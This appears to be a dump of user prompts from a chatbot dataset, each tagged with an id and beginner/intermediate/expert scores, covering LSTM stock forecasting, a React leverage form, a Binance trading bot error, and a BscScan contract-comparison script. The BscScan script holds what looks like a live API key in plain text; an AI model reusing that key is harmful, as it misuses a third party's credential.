dataX, dataY = [], []
for i in range(len(dataset)-look_back-1):
a = dataset[i:(i+look_back), 0]
dataX.append(a)
dataY.append(dataset[i + look_back, 0])
return np.array(dataX), np.array(dataY)
look_back = 1
X, y = create_dataset(dataset, look_back)
X = np.reshape(X, (X.shape[0], 1, X.shape[1]))
# 1. Increasing the size of training data
train_size = int(len(X) * 0.9)
test_size = len(X) - train_size
X_train, X_test = X[:train_size], X[train_size:]
y_train, y_test = y[:train_size], y[train_size:]
# 4. Cross-validation
tscv = TimeSeriesSplit(n_splits=5)
for train_index, test_index in tscv.split(X_train):
X_train_cv, X_valid_cv = X_train[train_index], X_train[test_index]
y_train_cv, y_valid_cv = y_train[train_index], y_train[test_index]
# 3. Simplifying the model -reduce layers or use smaller layers
model = Sequential()
model.add(LSTM(50, input_shape=(1, look_back), kernel_regularizer=L1L2(l1=0.0, l2=0.1)))
model.add(Dense(1))
# 2. Regularization
model.compile(loss='mean_squared_error', optimizer='adam')
model.fit(X_train_cv, y_train_cv, epochs=5, batch_size=1, verbose=0, validation_data=(X_valid_cv, y_valid_cv))
trainPredict = model.predict(X_train)
testPredict = model.predict(X_test)
trainPredict = scaler.inverse_transform(trainPredict)
y_train = scaler.inverse_transform([y_train])
testPredict = scaler.inverse_transform(testPredict)
y_test = scaler.inverse_transform([y_test])
trainPredictPlot = np.empty_like(dataset)
trainPredictPlot[:, :] = np.nan
trainPredictPlot[look_back:len(trainPredict)+look_back, :] = trainPredict
# Shift test predictions for plotting
testPredictPlot = np.empty_like(dataset)
testPredictPlot[:, :] = np.nan
total_len = len(dataset) - len(testPredict) - 1
testPredictPlot[total_len:len(dataset)-1, :] = testPredict
# Plot baseline and predictions
plt.figure(figsize=(12,6))
plt.plot(scaler.inverse_transform(dataset), label='Actual')
plt.plot(trainPredictPlot, label='Train Prediction')
plt.plot(testPredictPlot, label='Test Prediction')
plt.xlabel('Time Index')
plt.ylabel('Stock Price')
plt.legend(loc='upper left')
plt.title('Actual vs Predicted Stock Prices')
plt.show()
model.save('my_model.h5')
from sklearn.metrics import mean_squared_error
import math
trainScore = math.sqrt(mean_squared_error(trainY[0], trainPredict[:,0]))
print('Train Score: %.2f RMSE' % (trainScore))
testScore = math.sqrt(mean_squared_error(testY[0], testPredict[:,0]))
print('Test Score: %.2f RMSE' % (testScore))
# 1. Take the last look_back days (last day in this case) of the dataset
last_day = dataset[-look_back:]
# 2. Scale the input using the fitted MinMaxScaler
last_day_scaled = scaler.transform(last_day)
# 3. Reshape the input to match the required model input shape
last_day_scaled_reshaped = np.reshape(last_day_scaled, (1, 1, look_back))
# 4. Use model.predict() to predict the scaled value for ‘2021-01-02’
next_day_scaled_prediction = model.predict(last_day_scaled_reshaped)
# 5. Inverse-transform the predicted scaled value to the original range using the MinMaxScaler
next_day_prediction = scaler.inverse_transform(next_day_scaled_prediction)
# 6. Print or use the predicted value
print("Prediction for 2021-01-02: ", next_day_prediction[0][0])
|
1508cc4933c25d938c56fc332e70a617
|
{
"intermediate": 0.41953906416893005,
"beginner": 0.38105329871177673,
"expert": 0.1994076669216156
}
|
11,336
|
const LeveragePage: NextPage = () => {
const [leverages, setLeverages] = useState<Array<Leverage>>([]);
const [filteredLeverages, setFilteredLeverages] = useState<Array<Leverage>>([]);
const [searchInputValue, setSearchInputValue] = useState("");
const [localChangedLeverage, setLocalChangedLeverage] = useState<{symbol: string, value: number|undefined}>({
symbol: "symbol",
value: undefined,
});
const onChangeLeverage = (symbol: string, value: number|undefined) => {
setLocalChangedLeverage({symbol, value});
};
useEffect(() => {
if (undefined !== localChangedLeverage.value) {
setChangedLeverages({
...changedLeverages,
[localChangedLeverage.symbol]: localChangedLeverage.value,
});
} else {
setChangedLeverages(Object.keys(changedLeverages).reduce(
(acc, key) => {
return key === localChangedLeverage.symbol
? acc
: {...acc, [key]: changedLeverages[key]};
},
{},
));
}
}, [localChangedLeverage]);
return {
filteredLeverages.map((leverage, index) => {
return <Grid item sm={12} md={4} key={leverage.symbol}>
<LeverageForm
index={index}
leverage={leverage}
selected={undefined !== changedLeverages[leverage.symbol]}
onChange={onChangeLeverage}
value={changedLeverages[leverage.symbol]}
/>
</Grid>;
})
}
};
export default LeveragePage;
const LeverageForm = memo(
function LeverageForm(
{leverage, index, value, selected, onChange}: LeverageFormProps
) {
const [leverageValue, setLeverageValue] = useState<number>(value || leverage.leverage);
const [checked, setChecked] = useState(selected);
useEffect(() => {
onChange(leverage.symbol, checked ? leverageValue : undefined);
}, [leverageValue, checked]);
useEffect(() => {
if (!checked && leverage.leverage !== leverageValue) {
setChecked(true);
}
}, [leverageValue]);
useEffect(() => {
if (checked !== selected) {
setChecked(selected);
if (!selected) {
setLeverageValue(leverage.leverage);
}
}
}, [selected]);
import { createSlice } from "@reduxjs/toolkit";
import {HYDRATE} from "next-redux-wrapper";
import { Leverage } from "../actions/cicap-diary-trades";
interface LeverageSlice {
leverage: { [key: string]: Leverage },
}
const initialState: LeverageSlice = {
leverage: {},
};
export const leverageSlice = createSlice({
name: "leverageSlice",
initialState,
reducers: {
setLeverage(state, action) {
state.leverage = action.payload;
},
},
extraReducers: {
[HYDRATE]: (state, action) => {
return {
...state,
...action.payload,
};
},
},
});
export const {
setLeverage,
} = leverageSlice.actions;
export default leverageSlice.reducer;
1. В редаксе у leverages должен быть тип например {[key: string]: Leverage}, где в key хранится symbol.
Тогда в LeverageForm можно передать только symbol и index. Доставать данные уже внутри LeverageForm по symbol:
const leverages = useSelector((state: AppState) => state.leverageSlice.leverages[symbol]);
Тогда LeverageForm будет ререндериться только при изменении плеча по его монете.
2. changed можно сделать свойством объекта Leverage.
3. Такой момент еще. В pages/leverage.tsx используется выборка:
const leverages = useSelector((state: AppState) => state.leverageSlice.leverages);
Она нужна по большей степени для того, чтобы запустить перебор по всем доступным плечам. При любом изменении в плечах этот компонент (страница) будет перерендериваться и соответственно все дочерние компоненты. Поэтому нужно в стейт добавить symbols: Array<string>. И заполнять этот массив в момент получения всех доступных плеч с бека. На странице вытягивать только symbols и перебирать его.
|
0eb02360a5d948611927b7b935f5b5d0
|
{
"intermediate": 0.3125772476196289,
"beginner": 0.5769684910774231,
"expert": 0.11045430600643158
}
|
11,337
|
given this this array `[ {
"underdog": {
"line": 1.6,
"true_prob": null,
"direction": null,
"slip_selections": {
"over": {
"id": "226cfceb-d6cb-4c35-bc14-e7a16a583c33",
"choice": "higher",
"choice_display": "Higher",
"over_under_line_id": "bb6c2adc-95f6-4650-99cc-a7e34d9b3a17",
"type": "OverUnderOption"
},
"under": {
"id": "c3a3d856-f229-4cde-86dd-8151b7a1e95c",
"choice": "lower",
"choice_display": "Lower",
"over_under_line_id": "bb6c2adc-95f6-4650-99cc-a7e34d9b3a17",
"type": "OverUnderOption"
}
}
},
"prizepicks": {
"line": 1.5,
"true_prob": null,
"direction": null,
"slip_selections": {
"over": {
"wager_type": "over",
"projection_id": "1380602"
},
"under": {
"wager_type": "under",
"projection_id": "1380602"
}
}
},
"draftkings": {
"line": 1.5,
"true_prob": null,
"direction": null,
"slip_selections": null
},
"player_name": "Matthew Boyd",
"market_name": "Walks Allowed"
}] ` detect when the `line` is different from other others in the dictionary. In this case, the line in `underdog` is higher so return the underdog dictionary.
|
a01bfe6e3b873bb16bde687046af1746
|
{
"intermediate": 0.324043333530426,
"beginner": 0.4373980164527893,
"expert": 0.23855865001678467
}
|
11,338
|
I sued this code: import time
from binance.client import Client
from binance.enums import *
from binance.exceptions import BinanceAPIException
from binance.helpers import round_step_size
import pandas as pd
import json
import numpy as np
import pytz
import datetime as dt
import ccxt
from decimal import Decimal
import requests
import hmac
import hashlib
import ntplib
import os
from ta import trend, momentum
API_KEY = ''
API_SECRET = ''
client = Client(API_KEY, API_SECRET)
# Set the endpoint and parameters for the request
url = "https://fapi.binance.com/fapi/v2/account"
timestamp = int(time.time() * 1000)
recv_window = 5000
params = {
"timestamp": timestamp,
"recvWindow": recv_window
}
# Sign the message using the Client’s secret key
message = '&'.join([f"{k}={v}" for k, v in params.items()])
signature = hmac.new(API_SECRET.encode(), message.encode(), hashlib.sha256).hexdigest()
params['signature'] = signature
leverage = 100
# Send the request using the requests library
response = requests.get(url, params=params, headers={'X-MBX-APIKEY': API_KEY})
account_info = response.json()
# Get the USDT balance and calculate the max trade size based on the leverage
try:
usdt_balance = next((item for item in account_info['accountBalance'] if item["asset"] == "USDT"), {"free": 0})['free']
except KeyError:
usdt_balance = 0
print("Error: Could not retrieve USDT balance from API response.")
max_trade_size = float(usdt_balance) * leverage
# Get the current time and timestamp
now = dt.datetime.now()
date = now.strftime("%m/%d/%Y %H:%M:%S")
print(date)
timestamp = int(time.time() * 1000)
STOP_LOSS_PERCENTAGE = -50
TAKE_PROFIT_PERCENTAGE = 100
MAX_TRADE_QUANTITY_PERCENTAGE = 100
POSITION_SIDE_SHORT = 'SELL'
POSITION_SIDE_LONG = 'BUY'
quantity = 1
symbol = 'BTC/USDT'
order_type = 'market'
leverage = 100
max_trade_quantity_percentage = 1
binance_futures = ccxt.binance({
'apiKey': API_KEY,
'secret': API_SECRET,
'enableRateLimit': True, # enable rate limitation
'options': {
'defaultType': 'future',
'adjustForTimeDifference': True
},'future': {
'sideEffectType': 'MARGIN_BUY', # MARGIN_BUY, AUTO_REPAY, etc…
}
})
# Load the market symbols
def sync_time():
ntp_client = ntplib.NTPClient()
response = ntp_client.request('pool.ntp.org', version=3)
now = time.time()
offset = response.offset
new_time = now + offset
# Set the system clock to the new time
os.system(f'sudo date -s @{int(new_time)}')
print(f'New time: {dt.datetime.now()}')
recv_window = 10000
params = {
"timestamp": timestamp,
"recvWindow": recv_window
}
try:
markets = binance_futures.load_markets()
except ccxt.BaseError as e:
print(f'Error fetching markets: {e}')
markets = []
if symbol in markets:
print(f"{symbol} found in the market")
else:
print(f"{symbol} not found in the market")
# Get server time and time difference
def get_server_time(exchange):
return exchange.fetch_time()
def get_time_difference():
server_time = get_server_time(binance_futures)
local_time = int(time.time() * 1000)
time_difference = local_time - server_time
return time_difference
time.sleep(1)
def get_klines(symbol, interval, lookback):
url = "https://fapi.binance.com/fapi/v1/klines"
end_time = int(time.time() * 1000) # end time is now
start_time = end_time - (lookback * 60 * 1000) # start time is lookback minutes ago
symbol = symbol.replace("/", "") # remove slash from symbol
query_params = f"?symbol={symbol}&interval={interval}&startTime={start_time}&endTime={end_time}"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
}
response = requests.get(url + query_params, headers=headers)
response.raise_for_status()
data = response.json()
if not data: # if data is empty, return None
print('No data found for the given timeframe and symbol')
return None
ohlc = []
for d in data:
timestamp = dt.datetime.fromtimestamp(d[0]/1000).strftime('%Y-%m-%d %H:%M:%S')
ohlc.append({
'Open time': timestamp,
'Open': float(d[1]),
'High': float(d[2]),
'Low': float(d[3]),
'Close': float(d[4]),
'Volume': float(d[5])
})
df = pd.DataFrame(ohlc)
df.set_index('Open time', inplace=True)
return df
df = get_klines(symbol, '1m', 44640)
# Define signal generator function
def signal_generator(symbol, interval='1m'):
# Get historical data
klines = client.get_historical_trades(symbol, interval, "1000 hours ago UTC")
df = pd.DataFrame(klines, columns=['timestamp', 'open', 'high', 'low', 'close', 'volume', 'close_time', 'quote_asset_volume', 'num_trades', 'taker_buy_base_asset_volume', 'taker_buy_quote_asset_volume', 'ignore'])
# Convert data to appropriate format
df['timestamp'] = pd.to_datetime(df['timestamp'], unit='ms')
df.set_index('timestamp', inplace=True)
df = df.astype(float)
# Calculate technical indicators
df['SMA_20'] = trend.sma_indicator(df['close'], window=20)
df['SMA_50'] = trend.sma_indicator(df['close'], window=50)
df['RSI'] = momentum.rsi(df['close'], window=14)
# Define signal conditions based on technical indicators
if df['SMA_20'][-1] > df['SMA_50'][-1] and df['SMA_20'][-2] <= df['SMA_50'][-2] and df['RSI'][-1] > 50:
return 'buy'
elif df['SMA_20'][-1] < df['SMA_50'][-1] and df['SMA_20'][-2] >= df['SMA_50'][-2] and df['RSI'][-1] < 50:
return 'sell'
else:
return ''
df = signal_generator(symbol, interval='1m')
def order_execution(symbol, signal, step_size, leverage, order_type):
# Set default value for response
response = {}
# Close any existing positions
current_position = None
positions = binance_futures.fapiPrivateGetPositionRisk()
for position in positions:
if position["symbol"] == symbol:
current_position = position
if current_position is not None and current_position["positionAmt"] != 0:
response = binance_futures.fapiPrivatePostOrder(
symbol=symbol,
side='SELL' if current_position['positionSide'] == 'LONG' else 'BUY',
type='MARKET',
quantity=abs(float(current_position['positionAmt'])),
positionSide=current_position['positionSide'],
reduceOnly=True
)
if 'orderId' in response:
print(f'Closed position: {response}')
else:
print(f'Error closing position: {response}')
time.sleep(1)
# Calculate appropriate order quantity and price based on signal
opposite_position = None
quantity = step_size
position_side = None #initialise to None
price = None
# Set default take profit price
take_profit_price = None
stop_loss_price = None
if signal == 'buy':
position_side = 'BOTH'
opposite_position = current_position if current_position and current_position['positionSide'] == 'SHORT' else None
order_type = 'TAKE_PROFIT_MARKET'
ticker = binance_futures.fetch_ticker(symbol)
price = 0 # default price
if 'ask' in ticker:
price = ticker['ask']
# perform rounding and other operations on price
else:
# handle the case where the key is missing (e.g. raise an exception, skip this signal, etc.)
take_profit_percentage = TAKE_PROFIT_PERCENTAGE
stop_loss_percentage = STOP_LOSS_PERCENTAGE
elif signal == 'sell':
position_side = 'BOTH'
opposite_position = current_position if current_position and current_position['positionSide'] == 'LONG' else None
order_type = 'STOP_MARKET'
ticker = binance_futures.fetch_ticker(symbol)
price = 0 # default price
if 'bid' in ticker:
price = ticker['bid']
# perform rounding and other operations on price
else:
# handle the case where the key is missing (e.g. raise an exception, skip this signal, etc.)
take_profit_percentage = TAKE_PROFIT_PERCENTAGE
stop_loss_percentage = STOP_LOSS_PERCENTAGE
# Set stop loss price
stop_loss_price = None
if price is not None:
price = round_step_size(price, step_size=step_size)
if signal == 'buy':
# Calculate take profit and stop loss prices for a buy signal
take_profit_price = round_step_size(price * (1 + TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
stop_loss_price = round_step_size(price * (1 - STOP_LOSS_PERCENTAGE / 100), step_size=step_size)
elif signal == 'sell':
# Calculate take profit and stop loss prices for a sell signal
take_profit_price = round_step_size(price * (1 - TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
stop_loss_price = round_step_size(price * (1 + STOP_LOSS_PERCENTAGE / 100), step_size=step_size)
# Placing new order
api_method = 'fapiPrivatePostOrder'
params = {
'symbol': symbol,
'side': signal.upper(),
'type': order_type,
'quantity': quantity,
'positionSide': position_side,
'leverage': leverage,
'price': price,
'stopPrice': stop_loss_price,
'takeProfit': take_profit_price
}
response = getattr(binance_futures, api_method)(params=params)
if 'orderId' in response:
print(f'Order placed: {response}')
else:
print(f'Error placing order: {response}')
time.sleep(1)
return response
signal = signal_generator(df)
while True:
df = get_klines(symbol, '1m', 44640) # await the coroutine function here
if df is not None:
signal = signal_generator(df)
if signal is not None:
print(f"The signal time is: {dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}:{signal}")
time.sleep(1)
But I getting ERROR: Error: Could not retrieve USDT balance from API response.
06/10/2023 20:42:07
BTC/USDT found in the market
Traceback (most recent call last):
File "c:\Users\Alan\.vscode\jew_bot\jew_bot\jew_bot.py", line 175, in <module>
df = signal_generator(symbol, interval='1m')
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "c:\Users\Alan\.vscode\jew_bot\jew_bot\jew_bot.py", line 155, in signal_generator
klines = client.get_historical_trades(symbol, interval, "1000 hours ago UTC")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
TypeError: define_getter.<locals>.getter() takes 1 positional argument but 4 were given
|
1c6c86fdf9ea4242d6a837ae4fbd0b3b
|
{
"intermediate": 0.47572600841522217,
"beginner": 0.3873351812362671,
"expert": 0.13693876564502716
}
|
11,339
|
how to unit test a chart (System.Windows.Controls.DataVisualization.Charting.Chart chart) saved to a .png file? Can I create a temp chart with a random data?
|
12456fe050099536cf6519c352719113
|
{
"intermediate": 0.57755047082901,
"beginner": 0.1972118616104126,
"expert": 0.2252376824617386
}
|
11,340
|
# Сравнивает исходный код контракта токена
# Комментарии в коде в расчет не берутся
import re
import requests
API_KEY = "CXTB4IUT31N836G93ZI3YQBEWBQEGGH5QS"
BASE_URL = "https://api.bscscan.com/api"
def remove_comments(source_code):
# Remove single-line comments
source_code = re.sub(r"//.", "", source_code)
# Remove multi-line comments
source_code = re.sub(r" / *[\s\S]? * / ", "", source_code)
return source_code
def get_contract_source_code(address):
params = {
"module": "contract",
"action": "getsourcecode",
"address": address,
"apiKey": API_KEY
}
response = requests.get(BASE_URL, params=params)
data = response.json()
if data["status"] == "1":
source_code = data["result"][0]["SourceCode"]
return remove_comments(source_code)
else:
return None
def find_similar_contracts(reference_addresses, candidate_addresses):
reference_source_codes = {}
for reference_address in reference_addresses:
source_code = get_contract_source_code(reference_address)
if source_code is not None:
reference_source_codes[reference_address] = source_code
if not reference_source_codes:
print("No source code found for reference contracts")
return []
similar_contracts = {}
for address in candidate_addresses:
candidate_source_code = get_contract_source_code(address)
if candidate_source_code is not None:
for reference_address, reference_source_code in reference_source_codes.items():
if candidate_source_code == reference_source_code:
if reference_address not in similar_contracts:
similar_contracts[reference_address] = [address]
else:
similar_contracts[reference_address].append(address)
return similar_contracts
if __name__ == "__main__":
# Replace this list with a list of reference contract addresses to check
reference_addresses = ["0x4401E60E39F7d3F8D5021F113306AF1759a6c168", "0x2023aa62a7570ffd59f13fde2cac0527d45abf91",
"0x445645eC7c2E66A28e50fbCF11AAa666290Cd5bb", "0x1f5FbCF2787140b2F05081Fd9f69Bc0F436B13C1",
"0x735204a9420af122142a18F03464Bc311CDEA95B", "0x82b12a2ca1B8003ED7249C88Bb2B7221809AcAc4",
"0x03c5610C0749a16f2B05C53A26220cc872918fd4"]
# Replace this list with a list of candidate contract addresses to check
# For example, you can fetch a list of contracts created recently using another BscScan API endpoint
candidate_addresses = ["0x4401E60E39F7d3F8D5021F113306AF1759a6c168"]
similar_contracts = find_similar_contracts(reference_addresses, candidate_addresses)
print("Contracts with similar source code (ignoring comments):")
for reference_address, similar_addresses in similar_contracts.items():
print(f"Reference contract: {reference_address}")
for address in similar_addresses:
print(f"Similar contract: {address}")
The code above only detects contracts that are completely identical to each other.
Change the code so that it also detects contracts that are as similar as possible to each other
|
e639d84988ee0088694662d3e0b1b9fb
|
{
"intermediate": 0.2669708728790283,
"beginner": 0.4960957169532776,
"expert": 0.2369333803653717
}
|
11,341
|
Hi there
|
0833bc157e440cdfbe26ae34cb46f01e
|
{
"intermediate": 0.32728445529937744,
"beginner": 0.24503648281097412,
"expert": 0.42767903208732605
}
|
11,342
|
given this input `[ {
"underdog": {
"line": 99.5,
"true_prob": null,
"direction": null,
"slip_selections": {
"over": {
"id": "bf1c47ce-c3da-468a-a013-92ca36c84aed",
"choice": "higher",
"choice_display": "Higher",
"over_under_line_id": "137a976c-fdd2-461a-a032-5facd80693e8",
"type": "OverUnderOption"
},
"under": {
"id": "6cfdf1c8-d440-4e10-a9e9-8f856c97f4a1",
"choice": "lower",
"choice_display": "Lower",
"over_under_line_id": "137a976c-fdd2-461a-a032-5facd80693e8",
"type": "OverUnderOption"
}
}
},
"prizepicks": {
"line": 98.5,
"true_prob": null,
"direction": null,
"slip_selections": {
"over": {
"wager_type": "over",
"projection_id": "1380149"
},
"under": {
"wager_type": "under",
"projection_id": "1380149"
}
}
},
"parlayplay": {
"line": 98.5,
"true_prob": null,
"direction": null,
"slip_selections": {
"over": {
"playerId": 1755982,
"playerName": "Kodai Senga",
"teamId": 6196,
"matchId": 524494,
"value": 98.5,
"matchPeriod": "",
"challengeName": "Pitches Thrown",
"challengeOption": "bab_pitchesThrown",
"matchPeriods": [
"FG"
],
"option": 1,
"updated": ""
},
"under": {
"playerId": 1755982,
"playerName": "Kodai Senga",
"teamId": 6196,
"matchId": 524494,
"value": 98.5,
"matchPeriod": "",
"challengeName": "Pitches Thrown",
"challengeOption": "bab_pitchesThrown",
"matchPeriods": [
"FG"
],
"option": 0,
"updated": ""
}
}
},
"player_name": "Kodai Senga",
"market_name": "Pitch Count"
},
{
"underdog": {
"line": 92.5,
"true_prob": null,
"direction": null,
"slip_selections": {
"over": {
"id": "90105b16-dc67-4110-94dc-8ee0aa9e20d1",
"choice": "higher",
"choice_display": "Higher",
"over_under_line_id": "0a06c311-3fa2-42d7-a071-07b408134dd6",
"type": "OverUnderOption"
},
"under": {
"id": "f0e4bbc2-7999-421e-b227-e9cab2d8195e",
"choice": "lower",
"choice_display": "Lower",
"over_under_line_id": "0a06c311-3fa2-42d7-a071-07b408134dd6",
"type": "OverUnderOption"
}
}
},
"prizepicks": {
"line": 93.5,
"true_prob": null,
"direction": null,
"slip_selections": {
"over": {
"wager_type": "over",
"projection_id": "1380148"
},
"under": {
"wager_type": "under",
"projection_id": "1380148"
}
}
},
"parlayplay": {
"line": 93.5,
"true_prob": null,
"direction": null,
"slip_selections": {
"over": {
"playerId": 839212,
"playerName": "Johan Oviedo",
"teamId": 6185,
"matchId": 524494,
"value": 93.5,
"matchPeriod": "",
"challengeName": "Pitches Thrown",
"challengeOption": "bab_pitchesThrown",
"matchPeriods": [
"FG"
],
"option": 1,
"updated": ""
},
"under": {
"playerId": 839212,
"playerName": "Johan Oviedo",
"teamId": 6185,
"matchId": 524494,
"value": 93.5,
"matchPeriod": "",
"challengeName": "Pitches Thrown",
"challengeOption": "bab_pitchesThrown",
"matchPeriods": [
"FG"
],
"option": 0,
"updated": ""
}
}
},
"player_name": "Johan Oviedo",
"market_name": "Pitch Count"
}] ` return the dictionary that has the mismatched line in the case of Kodai Senga it will return the underdog dictionary of data
|
a061650ff85f0508ed288056bf40a041
|
{
"intermediate": 0.3107140064239502,
"beginner": 0.4510822296142578,
"expert": 0.2382037192583084
}
|
11,343
|
2d addition matrix in c++
|
12163f50e4fa9603644848493a34402e
|
{
"intermediate": 0.30872827768325806,
"beginner": 0.2576105296611786,
"expert": 0.43366119265556335
}
|
11,344
|
I used this code: import time
from binance.client import Client
from binance.enums import *
from binance.exceptions import BinanceAPIException
from binance.helpers import round_step_size
import pandas as pd
import json
import numpy as np
import pytz
import datetime as dt
import ccxt
from decimal import Decimal
import requests
import hmac
import hashlib
import ntplib
import os
from ta import trend, momentum
API_KEY = ''
API_SECRET = ''
client = Client(API_KEY, API_SECRET)
# Set the endpoint and parameters for the request
url = "https://fapi.binance.com/fapi/v2/account"
timestamp = int(time.time() * 1000)
recv_window = 5000
params = {
"timestamp": timestamp,
"recvWindow": recv_window
}
# Sign the message using the Client’s secret key
message = '&'.join([f"{k}={v}" for k, v in params.items()])
signature = hmac.new(API_SECRET.encode(), message.encode(), hashlib.sha256).hexdigest()
params['signature'] = signature
leverage = 100
# Send the request using the requests library
response = requests.get(url, params=params, headers={'X-MBX-APIKEY': API_KEY})
account_info = response.json()
# Get the USDT balance and calculate the max trade size based on the leverage
try:
usdt_balance = next((item for item in account_info['accountBalance'] if item["asset"] == "USDT"), {"free": 0})['free']
except KeyError:
usdt_balance = 0
print("Error: Could not retrieve USDT balance from API response.")
max_trade_size = float(usdt_balance) * leverage
# Get the current time and timestamp
now = dt.datetime.now()
date = now.strftime("%m/%d/%Y %H:%M:%S")
print(date)
timestamp = int(time.time() * 1000)
STOP_LOSS_PERCENTAGE = -50
TAKE_PROFIT_PERCENTAGE = 100
MAX_TRADE_QUANTITY_PERCENTAGE = 100
POSITION_SIDE_SHORT = 'SELL'
POSITION_SIDE_LONG = 'BUY'
quantity = 1
symbol = 'BTC/USDT'
order_type = 'market'
leverage = 100
max_trade_quantity_percentage = 1
binance_futures = ccxt.binance({
'apiKey': API_KEY,
'secret': API_SECRET,
'enableRateLimit': True, # enable rate limitation
'options': {
'defaultType': 'future',
'adjustForTimeDifference': True
},'future': {
'sideEffectType': 'MARGIN_BUY', # MARGIN_BUY, AUTO_REPAY, etc…
}
})
# Load the market symbols
def sync_time():
ntp_client = ntplib.NTPClient()
response = ntp_client.request('pool.ntp.org', version=3)
now = time.time()
offset = response.offset
new_time = now + offset
# Set the system clock to the new time
os.system(f'sudo date -s @{int(new_time)}')
print(f'New time: {dt.datetime.now()}')
recv_window = 10000
params = {
"timestamp": timestamp,
"recvWindow": recv_window
}
try:
markets = binance_futures.load_markets()
except ccxt.BaseError as e:
print(f'Error fetching markets: {e}')
markets = []
if symbol in markets:
print(f"{symbol} found in the market")
else:
print(f"{symbol} not found in the market")
# Get server time and time difference
def get_server_time(exchange):
return exchange.fetch_time()
def get_time_difference():
server_time = get_server_time(binance_futures)
local_time = int(time.time() * 1000)
time_difference = local_time - server_time
return time_difference
time.sleep(1)
def get_klines(symbol, interval, lookback):
url = "https://fapi.binance.com/fapi/v1/klines"
end_time = int(time.time() * 1000) # end time is now
start_time = end_time - (lookback * 60 * 1000) # start time is lookback minutes ago
symbol = symbol.replace("/", "") # remove slash from symbol
query_params = f"?symbol={symbol}&interval={interval}&startTime={start_time}&endTime={end_time}"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'
}
response = requests.get(url + query_params, headers=headers)
response.raise_for_status()
data = response.json()
if not data: # if data is empty, return None
print('No data found for the given timeframe and symbol')
return None
ohlc = []
for d in data:
timestamp = dt.datetime.fromtimestamp(d[0]/1000).strftime('%Y-%m-%d %H:%M:%S')
ohlc.append({
'Open time': timestamp,
'Open': float(d[1]),
'High': float(d[2]),
'Low': float(d[3]),
'Close': float(d[4]),
'Volume': float(d[5])
})
df = pd.DataFrame(ohlc)
df.set_index('Open time', inplace=True)
return df
df = get_klines(symbol, '1m', 44640)
# Define function to generate trading signals
def signal_generator(df):
buy = df['SMA'] > df['SMA'].shift(1)
buy &= df['RSI'] < 30
sell = df['SMA'] < df['SMA'].shift(1)
sell |= df['RSI'] > 70
return buy, sell
df = get_klines(symbol, '1m', 44640)
def order_execution(symbol, signal, step_size, leverage, order_type):
# Set default value for response
response = {}
# Close any existing positions
current_position = None
positions = binance_futures.fapiPrivateGetPositionRisk()
for position in positions:
if position["symbol"] == symbol:
current_position = position
if current_position is not None and current_position["positionAmt"] != 0:
response = binance_futures.fapiPrivatePostOrder(
symbol=symbol,
side='SELL' if current_position['positionSide'] == 'LONG' else 'BUY',
type='MARKET',
quantity=abs(float(current_position['positionAmt'])),
positionSide=current_position['positionSide'],
reduceOnly=True
)
if 'orderId' in response:
print(f'Closed position: {response}')
else:
print(f'Error closing position: {response}')
time.sleep(1)
# Calculate appropriate order quantity and price based on signal
opposite_position = None
quantity = step_size
position_side = None #initialise to None
price = None
# Set default take profit price
take_profit_price = None
stop_loss_price = None
if signal == 'buy':
position_side = 'BOTH'
opposite_position = current_position if current_position and current_position['positionSide'] == 'SHORT' else None
order_type = 'TAKE_PROFIT_MARKET'
ticker = binance_futures.fetch_ticker(symbol)
price = 0 # default price
if 'ask' in ticker:
price = ticker['ask']
# perform rounding and other operations on price
else:
# handle the case where the key is missing (e.g. raise an exception, skip this signal, etc.)
take_profit_percentage = TAKE_PROFIT_PERCENTAGE
stop_loss_percentage = STOP_LOSS_PERCENTAGE
elif signal == 'sell':
position_side = 'BOTH'
opposite_position = current_position if current_position and current_position['positionSide'] == 'LONG' else None
order_type = 'STOP_MARKET'
ticker = binance_futures.fetch_ticker(symbol)
price = 0 # default price
if 'bid' in ticker:
price = ticker['bid']
# perform rounding and other operations on price
else:
# handle the case where the key is missing (e.g. raise an exception, skip this signal, etc.)
take_profit_percentage = TAKE_PROFIT_PERCENTAGE
stop_loss_percentage = STOP_LOSS_PERCENTAGE
# Set stop loss price
stop_loss_price = None
if price is not None:
price = round_step_size(price, step_size=step_size)
if signal == 'buy':
# Calculate take profit and stop loss prices for a buy signal
take_profit_price = round_step_size(price * (1 + TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
stop_loss_price = round_step_size(price * (1 - STOP_LOSS_PERCENTAGE / 100), step_size=step_size)
elif signal == 'sell':
# Calculate take profit and stop loss prices for a sell signal
take_profit_price = round_step_size(price * (1 - TAKE_PROFIT_PERCENTAGE / 100), step_size=step_size)
stop_loss_price = round_step_size(price * (1 + STOP_LOSS_PERCENTAGE / 100), step_size=step_size)
# Placing new order
api_method = 'fapiPrivatePostOrder'
params = {
'symbol': symbol,
'side': signal.upper(),
'type': order_type,
'quantity': quantity,
'positionSide': position_side,
'leverage': leverage,
'price': price,
'stopPrice': stop_loss_price,
'takeProfit': take_profit_price
}
response = getattr(binance_futures, api_method)(params=params)
if 'orderId' in response:
print(f'Order placed: {response}')
else:
print(f'Error placing order: {response}')
time.sleep(1)
return response
signal = signal_generator(df)
while True:
df = get_klines(symbol, '1m', 44640) # await the coroutine function here
if df is not None:
signal = signal_generator(df)
if signal is not None:
print(f"The signal time is: {dt.datetime.now().strftime('%Y-%m-%d %H:%M:%S')}:{signal}")
time.sleep(1)
But I getting ERROR: Traceback (most recent call last):
File "C:\Users\Alan\AppData\Roaming\Python\Python311\site-packages\pandas\core\indexes\base.py", line 3652, in get_loc
return self._engine.get_loc(casted_key)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "pandas\_libs\index.pyx", line 147, in pandas._libs.index.IndexEngine.get_loc
File "pandas\_libs\index.pyx", line 176, in pandas._libs.index.IndexEngine.get_loc
File "pandas\_libs\hashtable_class_helper.pxi", line 7080, in pandas._libs.hashtable.PyObjectHashTable.get_item
